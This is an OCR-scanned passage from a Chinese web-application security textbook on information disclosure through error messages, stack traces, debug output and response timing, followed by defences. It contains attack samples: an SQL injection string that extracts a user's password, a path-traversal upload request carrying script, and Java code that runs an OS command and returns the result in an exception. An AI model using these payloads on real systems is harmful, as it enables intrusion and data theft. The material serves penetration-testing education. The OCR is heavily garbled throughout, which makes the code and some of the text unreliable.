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的 逻辑 。 因 为 消息 披露 了 发 生 错 误 的 行 号 ， 所 以 能 够 确定 两 个 不 同 的 畏 
形 请 求 是 触发 同一 个 错误 ， 还 是 不 同 的 错误 。 通 过 在 几 个 参数 中 提交 不 
恨 的 输入 并 确认 错误 发 生 的 位 置 ， 还 可 以 确定 应 用 程序 处 理 不 同 参数 的 
顺序 。 系 统 性 地 修改 不 同 的 参数 ， 渗 透 测试 员 就 可 以 解析 出 服务 器 执行 
的 各 种 代码 路 径 。 


15.1.2 栈 追 踪 
大 多 数 Web 应 用 程序 用 比 简单 脚本 更 复杂 、 但 仍然 在 一 种 托管 执行 


环境 (managed execution environment) 下 运行 的 语言 编写 ， 例 如 ， 
Java, C##llVisual Basic. NET。 如 果 这 些 语言 中 出 现 无 法 处 理 的 错误 ， 
浏览 器 往往 会 显示 完整 的 栈 追 踩 。 

栈 追 踪 是 一 种 结构 化 的 错误 消息 。 它 首先 说 明 具 体 的 错误 ， 接 着 在 
后 面 的 许多 行 中 摘 述 错误 发 生 时 调用 栈 的 执行 状态 。 调 用 栈 的 首 行 显示 
生成 错误 的 函数 ， 第 二 行 显 示 调 用 前 一 个 函数 的 函数 ， 以 此 类 推 ， 直 到 
显示 所 有 被 调用 的 函数 。 

下 面 是 一 个 由 ASP.NET 应 用 程序 生成 的 栈 奶 踩 : 


(HttpException (0x80004005): Cannot use a leading .. to exit above the 











top directory. ] 
System.Web.Util.UrlPath.Reduce(String path) +701 





System. Web. Util.UrlPath.Combine [String basepath, String relative}+304 
System.Web.UI.Control.ResolveUrl (String relativeUrl) 143 

PBSArp. StatPunc.tieb.MemberAwarePage.Redirect (String url) +130 

PESApp. StatPunc.Web.MemberAwarePage.Process{} +201 


PBSApp. StatPunc.Web.MemberAwarePage.OnLoad {EventArgs è) 
System.Web.UI .Control.LoadRecursive(} +35 


System.Web.UI. Page.ProcessRequestMain{) +750 


Version Information: Microsoft .NET Framework Version:1.1.4322.2300; 
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亨 的 攻击 。 

口 通常 ， 它 会 说 明 错 误 发 生 的 准确 原因 。 攻 击 者 可 以 根据 这 些 信息 
调整 输入 内 容 ， 避 开 错 误 条 件 ， 从 而 继续 实施 攻击 。 

口 调用 栈 经 常会 引用 应 用 程序 使 用 的 大 量 库 和 第 三 方 代码 组 件 。 可 
以 查阅 这 些 组 件 的 文档 资料 ， 了 解 它们 的 预期 行为 与 假设 。 还 可 以 创建 
这 些 组 件 的 本 地 应 用 ， 并 对 它 进行 测试 ， 了 解 应 用 程序 如 何 处 理 出 人 意 
料 的 输入 ， 并 确定 潜在 的 漏洞 。 

口 调用 栈 中 包含 用 于 处 理 请 求 的 所 有 权 代 码 组 件 的 名 称 。 了 解 这 些 


组 件 的 命名 方 采 及 其 相互 天 系 有 助 于 推断 应 用 程序 的 内 部 结构 与 功能 。 
口 栈 追 踪 中 通 音 包含 行 号 。 和 前 面 描述 的 简单 错误 消息 脚本 一 样 ， 
可 以 利用 这 些 行 写 探 查 并 理解 每 个 应 用 程序 组 件 的 内 部 逻辑 。 





口 错 误 消 奶 中 常常 包含 与 应 用 程序 及 其 运行 环境 有 关 的 其 他 信息 。 
在 前 面 的 示例 中 ， 可 以 确定 应 用 程序 所 使 用 的 ASP.NET 平台 的 版 本 ， 
因此 就 可 以 研究 这 个 平台 ， 碍 找 任何 已 知 或 新 出 现 的 漏洞 、 反 单行 为 、 
常见 的 配置 错误 等 。 





一 些 应 用 程序 生成 目 定义 的 错误 消息 ， 其 中 包含 大 量 的 调试 信息 。 
在 开发 与 测试 阶段 ， 这 些 消息 有 助 于 开发 者 对 应 用 程序 进行 调试 ， 其 中 
常常 包含 大 量 与 应 用 程序 运行 状态 有 关 的 信息 。 例 如 : 











LN 


idagor2nZ2pw3gp55ipszsb55 

SessionUser.Sessions App.FEStructure.Sessions 
SessionUser.Auth 1 

SessionUser.BranchID 193 
SessitonUser.CompanylD 76 
SessionUser.BrokerRef RRadv0O 
SessionUser.UserID 229 

SessionUser.Training 0 

SesslonUser.NetworkID 11 
SessionUser.BrandingPath FE 

LoginURL /Default/fedefault.aspx 

ReturnURL ../default/fedefault.aspx 
SessionUser.xey f7e50aef8facd30ft31f3aeal04cef26ed2ce2be50073C 
SessionClient.ID 306 

SessionClient.ReviewlD 245 

UPriv.2100 


SessionUser.NetworkLevelUser 0 
UPriv.2200 
SessionUser.BranchLeve_lUser 0 


SessionDatabase £d219.prod.wahh-bank.com 
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口 可 通过 用 户 输 入 操纵 的 关键 会 话 变 量 值 。 
口 数 据 库 等 后 端 组 件 的 主机 名 称 与 证 书 。 
口服 务 器 中 的 文件 与 目录 名 称 。 
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HRA) 。 

口 在 本 地 代码 组 件 中 出 现 的 异常 调试 信息 ， 包 括 CPU 寄 存 器 的 值 、 
栈 的 内 容 、 加 载 的 DLL 列表 及 其 基本 地 址 《请 参阅 第 16 章 了 解 相关 内 

容 ) 。 

如 果 在 实际 的 生产 代码 中 出 现 这 种 泄露 功能 的 错误 ， 那 么 应 用 程序 
就 存在 严重 的 安全 缺陷 。 渗 透 测 试 员 应 该 对 它 进 行 仔 细 检 查 ， 确 定 任何 
可 用 于 扩大 攻击 范围 的 数据 ， 并 且 可 以 通过 提交 专门 设计 的 输入 操纵 应 
用 程序 的 状态 ， 控 制 其 获取 信息 的 情况 。 





























不 仅 应 用 程序 自身， 数据 库 、 邮 件 服 务 喜 或 SOAP 服 务 圳 等 后 端 组 
件 也 会 返回 详尽 的 错误 消息 。 如 果 发 生 完全 无 法 处 理 的 错误 ， 应 用 程序 
通 种 会 返回 一 个 HITP 500 状 态 码 ， 而 且 啊 应 主体 中 也 包括 其 他 与 错误 
有 关 的 信息 。 其 他 情况 下 ， 应 用 程序 会 对 错误 进行 适当 处 理 ， 并 加 用 户 
返回 一 条 定制 消 妃 ， 其 中 有 时 还 包括 后 端 组 件 生成 的 错误 信息 。 在 菏 些 
情况 下 ， 信 息 披 露 本 号 可 能 被 攻击 者 当做 攻击 手段 。 应 用 程序 通 闻 会 在 
调试 消 妃 或 异常 错误 中 无 意 披露 信息 ， 因 此 组 织 的 安全 规程 可 能 会 完全 
忽略 这 种 信息 拔 露 。 

我 们 将 在 以 下 几 贡 中 讲 到 ， 利 用 应 用 程序 返回 的 消 妃 ， 攻 击 者 可 以 
实施 一 系列 其 他 攻击 。 

© 刊 用 信息 扳 露 扩大 攻击 范围 

在 针对 服务 器 后 端 组 件 实施 特定 攻击 时 ， 这 些 组 件 在 遇 到 错误 时 利 
常会 提供 直接 有 反馈。 渗透 测试 员 可 以 利用 这 些 反馈 对 攻击 进行 调整 。 数 
据 库 错误 消息 中 通常 包含 有 用 的 信息 。 例 如 ， 它 们 通常 会 披露 造成 错误 
的 查询 ， 渗 透 测试 员 可 以 将 其 用 于 优化 SQL 注入 攻击 。 

Failed to retrieve row with statement SELECT object data FROM 


leftr.cthlobject WHERE object_id = ‘FDJB00012' AND project_id = 'FOO' 

















请 参阅 第 9 章 了 解 如 何 实施 数据 库 攻 击 ， 并 根据 错误 消息 提取 信息 
的 详细 方法 。 

9 错误 消息 中 的 路 站 点 脚本 攻击 

如 第 12 章 所 述 ， 针 对 路 站 氮 脚本 的 安全 防御 是 一 个 艰巨 的 任务 ， 需 
要 确定 用 户 提交 的 数据 的 每 一 个 输出 位 置 。 虽 然 大 多 数 框架 在 报告 错误 
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常常 在 HITP 啊 应 中 的 非常 规 位 置 多 次 出 现 。 在 Tomcat 使 用 的 
HttpServlet-Response.sendError(O) 调 用 中 ， 错 误 数 据 还 是 啊 应 消息 头 的 一 
部 分 : 


HTTP/1.1 500 General Error Accessing Doc10083011 








Server: Apache-Coyote/1.1 

Content-Type: text/html; charset=ISO-8859-1 
Content-Length: 1105 

Date: Sat, 23 Apr 2011 08:52:15 GMT 


Connection: close 


如 果 拥 有 对 输入 字符 串 Doc10083011 的 控制 权 ， 攻 击 者 就 可 以 提交 
换行 字符 并 实施 HTTP 消 息 头 注入 攻击 ， 或 在 HITP 响 应 中 实施 跨 站 点 脚 
本 攻击 。 有 关 详 细 信息 ， 请 访问 以 下 链接 : 

http://www.securityfocus.com/archive/1/495021/100/0/threaded 

AY, EBERIN SE 2 AK Bl fell @EIFHTML A hs, BARH 
户 可 以 在 HITP 响 应 中 发 现 这 类 错误 显示 的 消息 。 在 这 些 情况 下 ， 攻 击 
者 就 可 以 轻松 实施 路 站 点 脚本 攻击 。 

9 信息 披露 中 的 解密 提示 

我 们 在 第 11 章 中 的 示例 讲 到 ， 利 用 应 用 程序 意外 显示 的 “加 密 提 
示 ”， 可 以 解密 以 加 密 格 式 向 用 户 显示 的 字符 串 。 信 息 披露 也 会 导致 同 
样 的 问题 。 在 第 7 章 的 示例 中 ， 某 应 用 程序 提供 一 个 用 于 文件 访问 的 加 
密 下 载 链接 。 如 果 茶 个 文件 已 被 移 走 或 删除 ， 应 用 程序 会 报告 无 法 下 载 
该 文件 。 当 然 ， 错 误 消 晨 中 包含 了 该 文件 的 解密 值 ， 因 此 ， 可 以 向 该 下 
载 链接 提供 任何 加 密 的 “文件 名 ”， 从 而 导致 错误 。 

在 这 种 情况 下 ， 信 息 披露 是 由 刻意 小 用 反馈 造成 的 。 如 果 对 参数 进 
行 解密 ， 然 后 将 其 用 在 各 种 函数 中 ， 只 要 其 中 的 任何 函数 会 记录 数据 或 
生成 错误 消息 ， 则 这 时 导致 的 信息 披露 往往 更 具 偶 有 性 。 例 如 ， 笔 者 曾 
遇 到 一 个 复杂 的 工作 流程 应 用 程序 ， 该 应 用 程序 使 用 通过 客户 端 传送 的 
如 条 将 dbid 和 grouphome 的 默认 值 互 换 ， 应 用 程序 将 返回 以 
Maik: 











java.sql.SQLException: Listener refused the connection with the 
following error: ORA-12505, TNS: listener does not currently know 
£ SID given in connect descriptor The Connection descriptor used 


by the client was: 172.16.214.154:1521:docs/londonoffice/2010/general 
这 段 消息 提供 了 相当 重要 的 信息 。 具 体 来 说 ，dbid 实 际 上 是 Oracle 
数据 库 的 连接 的 加 密 SID〔 连 接 描述 符 玉 用 “服务 器 :端口 :SID” 的 形 





式 ) ，grouphome 则 为 加 密 的 文件 路 径 。 

在 以 下 与 许多 其 他 信息 披露 攻击 类 似 的 攻击 中 ， 了 解 文件 路 径 为 攻 
击 者 提供 了 实施 文件 路 径 操 纵 攻 击 所 需 的 信息 。 在 文件 名 中 提供 3 个 路 
径 吉 历 字 符 ， 并 向 上 导航 类 似 的 目录 结构 ， 就 可 以 直接 向 其 他 组 的 工作 
空间 上 传 包含 恶意 代码 的 文件 : 


POST /dashboard/utils/fileupload HITP/1.1 








Accept: text/html, application/xhtml+xml, * 

Referer: http: //wahh/cGashkboard/common/newnote 

Accept-Language: en-GB 

Content-Type: multipart/form-data; boundary=------ 7absIa439b04c0 
Accept-Encoding: gzip, deflate 

Host: wahh 

Content-Length: 8088 

Proxy-Comnection: Keep-Alive 


he 7db3d439b04c0 


Content-Disposition: form-data; name="MAX_FILE_SIZE" 


100000 

~------—-7ddbidd39b04d4c0 

Content-Disposition: form-data; name="uploadedfile"; EFilename="../../../ 
newportoffice/2010/general/xss.htmi" 

Content-Type: text/html 

<html><body><script>... 


渗透 测试 步 又 


C1) 当 通 过 在 不 同 的 参数 中 提交 专门 设计 的 攻击 字符 串 ， 探 
查 应 用 程序 中 是 否 存在 常见 的 漏洞 时 ， 应 始终 监控 应 用 程序 的 响 
应 ， 以 确定 任何 可 能 包含 有 用 信息 的 错误 消 乱 。 

尝试 通过 在 错误 的 情况 下 提交 加 密 数 据 字符 串 ， 或 通过 对 未 处 
于 处 理 操 作 的 正确 状态 的 资源 执行 操作 ， 强 制 应 用 程序 返回 错误 啊 


应 。 
(2) 注意 ， 在 服务 器 啊 应 中 返回 的 错误 消息 可 能 不 会 在 浏览 
器 中 显示 。 因 此 ， 确 定 错误 条 件 的 有 效 方法 ， 是 在 每 一 个 原始 啊 应 
中 查找 经 常 出 现在 错误 消息 中 的 关键 字 。 例 如 : 
LJ error 
口 exception 
D illegal 
DQ invalid 
g fail 
DQ stack 
LJ access 
DQ directory 
g file 
Ø not found 
DQ varchar 
a ODBC 
口 SQL 
口 SELECT 
(3) 在 基本 请 求 中 发 送 一 系列 修改 参数 的 请 求 时 ， 为 避免 错 
误 警 报 ， 应 检查 最 初 的 请 求 是 否 已 经 包含 任何 正在 寻找 的 关键 字 。 
(4) 可 以 使 用 Burp Intruder 中 的 Grep 函 数 迅 速 确定 在 由 某 个 攻 
击 生 成 的 任何 啊 应 中 出 现 的 有 用 的 关键 字 〈 请 参阅 第 14 章 了 解 相 关 
AA) 。 如 果 发 现 匹配 的 关键 字 ， 应 手动 检查 相关 啊 应 ， 确 定 应 用 
程序 是 否 返回 任何 有 用 的 错误 信息 。 









































YY 提示 查看 浏览 器 中 的 服务 器 的 啊 应 时 要 注意 ， 默 认 情 况 
F, Internet Explorer 会 隐藏 许多 错误 消息 ， 并 用 一 个 第 规 页 面 代 蔡 
它们 。 可 以 选择 “工具 ”- “Internet Il” (Tools = Internet 
Options) ， 然 后 在 “高 级 ”(Advanced) 选项 卡 中 禁用 这 种 行为 。 





由 于 Web 应 用 程序 通常 会 采用 大 量 各 不 相同 的 技术 与 组 件 ， 因 此 渗 
透 测试 员 经 营 会 过 到 一 些 以 前 从 未 见 过 的 错误 消息 ， 它 们 可 能 不 会 立即 
揭示 应 用 程序 中 出 现 的 错误 的 本 质 。 在 这 种 情况 下 ， 可 以 从 各 种 公共 资 
源 获得 更 多 与 错误 消 轧 有 关 的 信息 。 

通常 ， 不 名 见 的 错误 消息 往往 是 由 某 个 特定 的 API 故 障 造成 的 。 对 
消息 文本 进行 搜索 就 可 以 找到 这 个 API 的 文档 资料 或 开发 者 论坛 ， 以 及 
讨论 这 个 问题 的 其 他 位 置 。 

许多 应 用 程序 采用 第 三 方 组 件 执行 一 些 常 见 的 任务 ， 如 搜索 、 购 物 
自 和 站 点 有 反馈 功能 。 这 些 组件 生 成 的 任何 错误 消 妃 可 能 已 经 出 现在 其 他 
应 用 程序 中 ， 并 被 人 们 在 其 他 地 方 讨论 。 

一 些 应 用 程序 中 合并 了 公开 发 布 的 源 代码 。 通 过 搜索 出 现在 不 常见 
错误 消 妃 中 的 一 些 特殊 的 表达 式 ， 葡 可 以 找到 实际 执行 相关 功能 的 源 代 
码 。 然 后 检查 这 些 代 码 ， 了 解 它们 对 输入 执行 了 何 种 处 理 以 及 如 何 操纵 
应 用 程序 ， 从 而 对 菏 个 漏洞 加 以 利用 。 
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(1) 使 用 标准 搜索 引擎 搜索 任何 不 季 见 的 错误 消息 的 文本 。 
可 以 使 用 各 种 高 级 搜索 特性 缩小 搜索 范围 ， 例 如 : 


"unable to retrieve" filetype:php 


(2) 检查 搜索 结果 ， 寻 找 所 有 关于 错误 消息 的 讨论 以 及 其 他 
出 现 相 同 消息 的 站 点 。 其 他 应 用 程序 生成 的 同一 条 错误 消息 可 能 更 
详细 ， 有 助 于 更 好 地 了 解 错 误 条 件 。 使 用 搜索 引擎 缓存 获取 不 再 出 
现在 当前 应 用 程序 中 的 错误 消息 。 

(3) 使 用 Google 代 码 搜 索 碍 找 任何 生成 特定 错误 消息 的 、 公 
开发 布 的 代码 。 搜 索 可 能 被 硬 编 码 到 应 用 程序 源 代 码 中 的 错误 消息 
eee 
细节 ， 例 如 : 


' and 1=(select password from users where uid=1)-- 


(4) 如 果 获 得 了 包含 库 与 第 三 方 代码 组 件 名 称 的 栈 奶 踪 ， 在 
上 述 两 种 搜索 引擎 中 搜索 这 些 名 称 。 

















有 些 情况 下 渗透 测试 员 可 以 系统 性 地 制造 错误 条 件 ， 以 获取 错误 消 
奶 中 的 敏感 信息 。 

假如 能 让 应 用 程序 对 一 个 特殊 的 数据 执行 某 种 无 效 的 操作 ， 就 可 能 
出 现 上 述 情 况 。 如 采 生 成 的 错误 消息 揭示 该 数据 的 值 ， 就 可 以 让 应 用 程 
I 
Ih o 
可 以 在 SQL 注入 攻击 中 利用 详尽 的 开放 式 数 据 库 连接 CODBC) 错 
误 消 轧 检 索 任 意 数据 库 碍 询 的 结果 。 例 如 ， 如 果 将 以 下 SQL 注入 
WHERE 子 句 中 ， 将 导致 数据 库 将 用 己 表 中 第 一 个 用 户 的 密码 转换 为 整 
数 ， 以 执行 求 值 操作 : 








Error: Conversion failed when converting the varchar value 
'37CE1CCA753 08590R4D6A35F288BS58FACDBB0841' to data type int. 


ae FB PEAR GE 


Frvov: Conversion failed when convertine the vavzaar value 
'ZICFICCATS3IGESIGF4N6A3 SFASEASEFACNR36841' to data type int. 


Al, yh VW, y 
ZV i: 
http://mdsec.net/addressbook/32 


Ikah, WORT De AE RE~ ANAE RER EER, W 
o 种 情形 ， 让 应 用 程序 将 有 用 的 信息 合并 到 错误 
HK 

一 些 数 据 库 允许 用 户 创建 用 Java 编 写 的 自 定 义 函 数 。 在 这 种 情况 
下 ， 渗 透 测试 员 可 以 利用 一 个 SQL 注 入 漏洞 创建 自己 的 函数 ， 执 行 任意 
任务 。 如 有 果 应 用 程序 同 浏 览 右 返回 错误 消 轧 ， 就 可 以 让 创建 的 函数 生成 
一 个 包含 任何 想 要 的 数据 的 异常 。 例 如 ， hy 
令 ls， 然 后 生成 一 个 包含 命令 输出 结果 的 异常 。 它 将 回 浏 览 器 返回 一 人 
栈 妃 踪 ， 其 中 第 一 行 包含 一 个 目录 列表 : 


ByteArrayOutputStream baos = new ByteArrayOutputStream{); 





try 

{ 
Process p = Runtime.getRuntime().exec({"1s"); 
InputStream is = p.getInputStream({}; 
int c; 
while (-1 t= te = is.read())) 

baos.write( {byte} c); 

) 

catch (Exception e} 

{ 

} 


throw new RuntimeException(new String(baos.toByteArray())); 











除 在 错误 消息 中 泄露 有 用 的 信息 外 ，Web 应 用 程序 直接 公布 的 信息 

也 是 它 披 吉 有 敏感 数据 的 另 一 个 主要 源头 。 由 于 以 下 原因 ， 应 用 程序 可 能 
会 公布 对 攻击 者 有 利 的 信息 。 

口 公布 的 信息 在 设计 上 属于 应 用 程序 核心 功能 的 一 部 分 。 

口 公布 的 信息 会 无 意 中 给 其 他 功能 造成 负面 影响 。 

口 由 仍然 存在 于 当前 应 用 程序 中 的 调试 功能 泄露 信息 。 

a 由 于 某 个 漏洞 〈 如 访问 控制 不 完善 IL Be 

应 用 程序 可 能 向 用 户 公布 的 敏感 信息 通常 包括 以 下 几 项 。 

口 有 效用 户 名 、 账 号 与 文档 ID 列表 。 

口 用 户 个 人 资料 ， 包 括 用 户 角色 与 权限 、 最 后 登录 日 期 与 账户 状 


n eee 屏幕 上 隐藏 显示 ， 但 却 出 现在 页 
源 代 码 

口 包含 在 日 志文 件 中 的 信息 ， 如 用 户 名 、URL、 执 行 的 操作 、 会 话 
与 数据 库 查 询 。 

口 客户 端 HTML 源 代码 中 与 应 用 程序 有 关 的 细节 ， 如 作为 注释 处 理 
的 链接 或 表单 字段 以 及 关于 漏洞 的 注释 。 




















态 。 
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D 检查 应 用 程序 解析 过 程 中 得 到 的 结果 (请 参阅 第 4 半 了 
解 相 关内 容 ) ， 确 定 可 用 于 获取 有 用 信息 的 所 有 服务 需 端 功能 与 客 
户 端 数据 。 

(2) 在 应 用 程序 中 确定 服务 器 向 浏览 费 返 回 密码 或 信用 卡 资 
料 等 敏感 数据 的 所 有 位 置 。 即 使 这 些 信息 在 屏幕 上 隐藏 显示 ， 但 仍 
然 可 以 在 服务 器 的 啊 应 中 看 到 这 些 信息 。 如 采 发 现 其 他 适当 的 漏 
洞 ， 例 如 访问 控制 或 会 话 处 理 方面 的 漏洞 ， 就 可 以 利用 这 种 行为 获 
取 属 于 其 他 应 用 程序 用 户 的 信息 。 

(3) 如 果 已 经 确定 任何 提取 敏感 信息 的 方法 ， 请 使 用 第 14 章 
描述 的 技巧 目 动 攻击 解析 过 程 。 

















15.3 EY 


有 些 情况 下 ， 应 用 程序 可 能 不 会 直接 泄露 任何 数据 ， 但 可 以 根据 它 
的 行为 准确 推 新 出 有 用 的 信息 。 

在 探查 其 他 类 型 漏洞 的 过 程 中 ， 我 们 已 经 遇 到 过 许多 以 这 种 方式 泄 
露 信 息 的 情况 ， 如 下 所 示 。 
口 注册 功 能 允许 在 选择 已 经 存在 的 用 户 名 时 根据 出 现 的 错误 消息 枚 
举 出 已 注 册 的 用 户 名 。 
口 搜索 引擎 允许 推 师 出 未 获 授权 就 可 直接 查看 的 编 入 索引 的 文档 内 
容 《〈 请 参阅 第 11 章 了 解 相 关内 容 ) 。 
口 在 盲目 SQL 注 入 漏洞 中 ， 可 以 通过 给 一 个 现 有 的 查询 增加 一 个 二 
进 制 条 件 ， 一 次 一 位 地 提取 信息 (请 参阅 第 9 章 了 解 相 关内 容 〉。 
口 .NET 中 的 “填充 提示 ”攻击 ， 在 这 种 攻击 中 ， 攻 击 者 可 以 通过 癌 服 
务 器 发 送 一 系列 请 求 ， 并 观察 哪些 请 求 在 解密 期 间 导 致 错误 ， 从 而 解密 
任何 字符 串 〈 请 参阅 第 18 章 ) 。 

另外 ， 根 据 某 种 对 攻击 者 有 利 的 事实 ， 如 果 应 用 程序 执行 不 同 操作 
所 用 的 时 间 各 不 相同 ， 那 么 ， 应 用 程序 行为 上 的 这 种 细微 差异 也 会 导致 
信息 泄露 。 这 种 差异 由 以 下 原因 造成 。 

口 许 多 复杂 的 大 型 应 用 程序 需要 从 数据 库 、 消 息 队 列 与 大 型 主机 等 
后 端 系统 中 提取 数据 。 为 提高 性 能 ， 一 些 应 用 程序 缓存 频 索 使 用 的 信 
恩 。 同 样 ， 一 些 应 用 程序 采用 一 种 延迟 加 载 〈lazy load) 模式 ， 仅 在 需 
要 时 加 载 对 象 和 数据 。 在 这 种 情况 下 ， 应 用 程序 会 从 服务 器 的 本 地 绥 存 
中 迅速 提取 出 最 近 访 问 的 数据 ， 而 从 相关 后 端 系统 中 相对 绥 慢 地 提取 出 


其 他 数据 。 
电子 银行 应 用 程序 常常 以 这 种 方式 运作 ， 与 活动 账户 
相 比 ， 访 问 一 个 休眠 账户 通常 需要 更 长 的 时 间 ; 这 
时 ， 技 巧 熟练 的 攻击 者 就 可 以 利用 这 种 行为 枚 举 出 其 
他 用 户 最 近 访 问 的 账户 。 
口 有 些 时 候 ， 应 用 程序 处理 茶 个 特殊 请 求 所 花 的 时 间 取 决 于 用 户 提 
区 的 数据 是 否 有 效 。 例 如 ， 如 果 癌 登录 机 制 提交 一 个 有 效 的 用 户 名 ， 应 
用 程序 就 会 执行 各 种 数据 库 查 询 ， 获 取 账 户 信 息 并 更 新 审计 日 志 ， 同 时 
执行 需要 进行 大 量 计算 的 操作 ， 根 据 保 存 的 散 列 确认 用 户 提 交 的 密码 。 
oe eee We ee 
























































口 一 些 应 用 程序 可 能 会 根据 用 户 输 入 执行 一 项 操作 。 如 果 用 户 提 交 
的 某 个 数据 无 效 ， 束 会 造成 超时 。 例 如 ， 如 果 某 应 用 程序 使 用 cookie 保 
存 一 个 前 端 负载 均衡 器 Coad balancer) 之 内 的 主机 地 址 ， 攻 击 者 就 可 
以 操纵 这 个 地 址 ， 扫 描 组 织 内 部 网 络 中 的 Web 服 务 器 。 如 果 提 交 的 服务 
器 地 址 不 属于 应 用 程序 基础 设施 的 范围 ， 应 用 程序 就 会 立即 返回 一 个 错 
误 。 如 果 提 交 一 个 不 存在 的 地 址 ， 那 么 尝试 连接 这 个 地 址 就 会 造成 超 
时 ， 然 后 应 用 程序 再 返回 与 上 一 种 情况 相同 的 常规 错误 。 攻 击 者 可 以 利 
用 Burp Intruder 结果 表 中 的 啊 应 计时 占 进 行 这 种 测试 。 注 意 ， 默 认 情 况 
下 这 些 列 隐藏 不 可 见 ， 但 可 通过 Columns 沫 单 显 示 。 
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C1) 应 用 程序 啊 应 时 间 上 的 差异 可 能 非常 微小 ， 难 以 探测 。 
通常 ， 只 有 在 回 关 键 区 域 提交 重要 的 数据 以 及 所 执行 的 处 理 很 可 能 
会 导致 时 间 差 异 时 ， 才 值得 在 应 用 程序 中 探查 这 种 行为 。 

(2) 为 测试 某 个 特殊 的 功能 ， 编 辑 两 个 列表 ， 其 中 分 别 包含 
几 个 已 知 有 效 《〈 或 最 近 被 访问 ) 的 数据 和 已 知 无 效 《〈 或 休眠 状态 ) 
的 数据 。 以 可 控制 的 方式 提出 包括 这 两 个 列表 中 的 每 一 个 数据 的 请 
求 ， 一 次 仅 提出 一 个 请 求 ， 然 后 监控 应 用 程序 啊 应 每 个 请 求 所 用 的 
时 间 。 确 定数 据 的 状态 与 啊 应 时 间 之 间 是 人 否 存 在 任何 关联 。 

(3) 可 以 使 用 Burp Intruder 目 动 完 成 这 项 任务 。 对 于 每 一 个 生 
成 的 请 求 ，Intruder 将 自动 记录 应 用 程序 啊 应 前 所 用 的 时 间 以 及 完 
Ee eh 时 间 。 还 可 以 按 这 些 属性 对 结果 表 进 行 分 类 ， 迅 速 确 
定 明显 关联 。 


























昌 然 我 们 不 可 能 或 无 法 完全 阻止 泄露 对 攻击 者 有 用 的 信息 ， 但 可 以 
采取 各 种 相对 简单 的 措施 ， 最 大 限度 地 减少 信息 泄露 ， 防 止 将 最 敏感 的 
数据 刘露 给 攻击 者 ， 避 免 应 用 程序 的 安全 造成 严重 破坏 。 











应 禁止 应 用 程序 同 用 户 的 浏览 器 返回 详尽 的 错误 消息 或 调试 信息 。 
如 果 发 生 无 法 预料 的 错误 《〈 如 数据 库 碍 询 错误 、 和 磁盘 文件 读 取 故 障 或 外 
部 API 调 用 异 钟 ) ， 应 用 程序 应 返回 相同 的 利 规 消息 ， 通 知 用 户 出 现 错 
误 。 如 果 因 为 支持 或 诊断 目的 而 有 必要 记录 调试 信息 ， 那 么 将 这 些 信 息 
保存 在 一 个 用 户 无 法 公开 访问 的 服务 器 端 日 志 中 ， 并 在 必要 时 问 用 户 返 
回 相关 日 志 记 录 的 索引 号 ， 方 便 他 们 在 联系 服务 台 时 报告 这 个 错误 。 

可 以 配置 大 多 数 应 用 程序 平台 与 Web 服 务 器 ， 使 其 拦截 错误 消 晨 ， 
不 将 它 返 回 给 浏览 器 。 

口 在 ASP.NET 中 ， 可 以 使 用 Web.config 文 件 的 customErrors 元 素 ， 通 
过 设置 mode 属 性 为 On 或 RemoteOnly， 并 在 defaultRedirect 节 点 指定 一 个 
定制 错误 页 面 ， 从 而 阻止 详尽 的 错误 消息 。 

口 在 Java Platform 中 ， 可 以 使 用 web.xml 文 件 的 error-page 元 素 配 置 定 
制 错误 消息 。exception-type 节 点 可 用 于 指定 一 个 Java 异常 类 型 ， 或 者 
使 用 error-code 节 点 指定 一 个 HITP 状 态 码 ;使 用 location 节 点 可 设 定 发 生 
错误 时 显示 的 定制 页 面 。 

口 在 Microsoft IIS 中 ， 可 以 使 用 一 个 Web 站 点 属性 页 面 的 “定制 错 
ik” (Custom Errors) 选项 卡 ， 为 不 同 的 HTTP 状态 码 指定 定制 错误 页 




















由 如 有 必要 ， 可 在 每 个 目录 的 基础 上 为 每 个 状态 码 设置 一 个 不 同 的 定 
制 页 面 。 

口 在 Apache 中 ， 可 以 使 用 httpd.conf 中 的 ErrorDocument 指 令 配 置 定 
制 错 误 页 面 。 例 如 : 











名 、 日 志 记 录 或 用 户 个 人 资料 。 如 果菜 些 用 户 需 要 访问 这 些 信 息 ， 应 使 


用 访问 控制 对 它们 进行 有 效 保护 ， 并 且 只 有 在 完全 必要 时 才 提 供 这 些 信 


如 果 必 须 回 授权 用 户 透露 敏感 信息 例如， 以 便 用 户 更 新 他 们 的 账 
户 信息 ) ， 那 么 在 不 必要 时 也 不 得 披露 现 有 数据 。 例 如 ， 应 以 截 短 的 形 
式 显 示 保 存 的 信用 卡号 ， 绝 不 能 预先 填 写 密码 字段 ， 即 使 它 在 屏 帮 上 隐 
藏 显示 。 这 些 防御 措施 有 助 于 减轻 验证 、 会 话 管理 与 访问 控制 等 应 用 程 
序 核 心安 全 机 制 中 存在 的 严重 漏洞 造成 的 影响 。 














只 要 有 可 能 ， 应 删除 或 修改 服务 旗 标 ， 避 免 泄 露 特定 软件 版 本 等 信 
县。 执行 这 种 防御 所 需 的 步骤 依 应 用 程序 所 使 用 的 技术 而 定 。 例 如 ， 在 
Microsoft HIS 中 ， 可 以 使 用 IISLockDown 工 具 中 的 URLScan 删 除 Server 消 
Ako ERIAM Apache 中 ， 使 用 mod_headers 模 块 可 达到 相同 的 目 
的 。 由 于 这 些 信 息 会 随时 改变 ， 建 议 在 进行 任何 修改 之 前 查阅 服务 右上 
的 文档 资料 。 

男 外 ， 还 应 删除 部 署 在 当前 生产 环境 中 的 客户 端 代码 (包括 全 部 
HTML 与 JavaScript 代码 ) 中 的 所 有 注释 。 

还 要 特别 注意 任何 厚 客 户 端 组 件 ， 如 Java applet 和 Activex 控件 。 
不 得 在 这 些 组 件 中 包含 任何 敏感 信息 。 技 术 熟 练 的 攻击 者 能 够 破译 或 逆 
回 制造 这 些 组 件 ， 恢 复 它 们 的 源 代 码 〈 请 参阅 第 5 音 了 解 相关 内 容 ) 。 














15.5 小结 


泄露 不 必要 的 信息 通常 不 会 对 应 用 程序 的 安全 造成 严重 影响 。 有 
时 ， 即 使 是 非常 详细 的 栈 奶 踩 与 其 他 调试 消息 ， 也 不 会 为 攻击 应 用 程序 
提供 很 大 帮助 。 

然而 ， 在 其 他 情况 下 ， 渗 透 测 试 员 可 能 会 发 现 非常 有 利于 实施 攻击 
的 信息 来 源 ， 例 如 ， 它 们 披露 了 用 户 名 列表 、 软 件 组 件 的 准确 版 本 ， 或 
者 浊 露 服务 器 器 应 用 程序 逻辑 的 内 部 结构 与 功能 。 

为 此 ， 要 对 应 用 程序 实施 严重 的 攻击 ， 渗 透 测试 员 必 须 对 应 用 程序 
